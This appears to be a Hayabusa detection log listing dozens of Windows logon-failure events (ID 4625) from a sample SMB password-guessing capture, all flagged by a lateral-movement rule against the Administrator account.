+2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TaPkJPIQnbL3VyUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZ7PZAT6hWWHNc29 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJVD4uVhwfLSJ6Ab | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6KME1I6tE0v9UAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Qtt1rk4n3tOJko2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: prPsA8EZHGfGPSHm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQqGXnwHtB87LSzT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6uLT1bjaIS0XBsWC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIgpraQTxFrcLphN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1D6qy57XImq4prx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Kw44Ffh4DIPlyuM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oKUdmKU74RmJysAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZUTzZw0T1tYRSP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nEOfjuAMa7HTsfcP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e7bG19emMTmyBQNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YsLkgWukfqS3wWJK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: liFcZjjpY3xXwe9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBUgbfzx2OEcOxWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVCV0WoZmLTFNH71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJmxGOqck4oQi1kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w7lYqaUvEtTp18DK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ9xQmGn61JJDeQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XuMXpvY9fmLm0eBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ofesuNErTLWuN0k4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsNq7SThd3b8oTwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmRWg5gNRcxDMFjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JXrGn6LehVwTGNNj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIq9DS71jCjWbgdY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kw2BQbdUml0EPNOs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugOqsKQFGmmLac3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3rZHUbOUVBYiHarB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: otv8ByrbWWoTz7pi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HVlHkJu4Gxc9dhxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKF5OCqLVVKvung0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avAdpkOlP0xji1vG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VFgzMjEz6M0LBnX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdJb0obVAqkY9GCw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ciSoQcLUgLfzaNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RECrGCCTJuDPlvYJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Z2w67uyC2NOgecT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRVetRdHvz0lJkOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXrtxquzyzxKnQgD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWOoEIEem7Q9Mdx0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86n5nIm04810NptD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M08noHtTqqx3pxSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P983pRVfCVlVTyA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMKlcLvRhlx9FMcZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0gwEDgRF2wUgTDAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9Q2GSALfiuEbulo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DKTja76Qe9vSjrdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXuUyKlvaOgMNSu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X3qdEQReXwHAZUS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqtfHJKOfmWXEd4s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVv7vete3uXixggi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0PF6E3wRP0Tk39ss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: touwF4IXUahG7jvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lMOi7rygc7SJ5TPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QjM1K5eFSA9U37oE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HgzyZqFU9v2kDVvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hJeVj2h0sBxwBuGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FNXI8b6Zcj1zU3JY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9DyH9oxFbRTCQ80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5LZo1ljGLOVKhwcC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvY6Q7RGKwjehARC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uKLrHVMevqniTck8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldxglvKFhLJQ3FV3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRHIAxIj9wFRIg67 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mc7nvfyDfWpnhhBx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB7Y4gPbxose5TsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yKFU6DJ8Wdtp2qdC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YlbxRctdClWIOjss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LToi5ANf3tUteu4h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 52YPmYviVPBqJ39Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JpzKsyxEKNLd8l1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
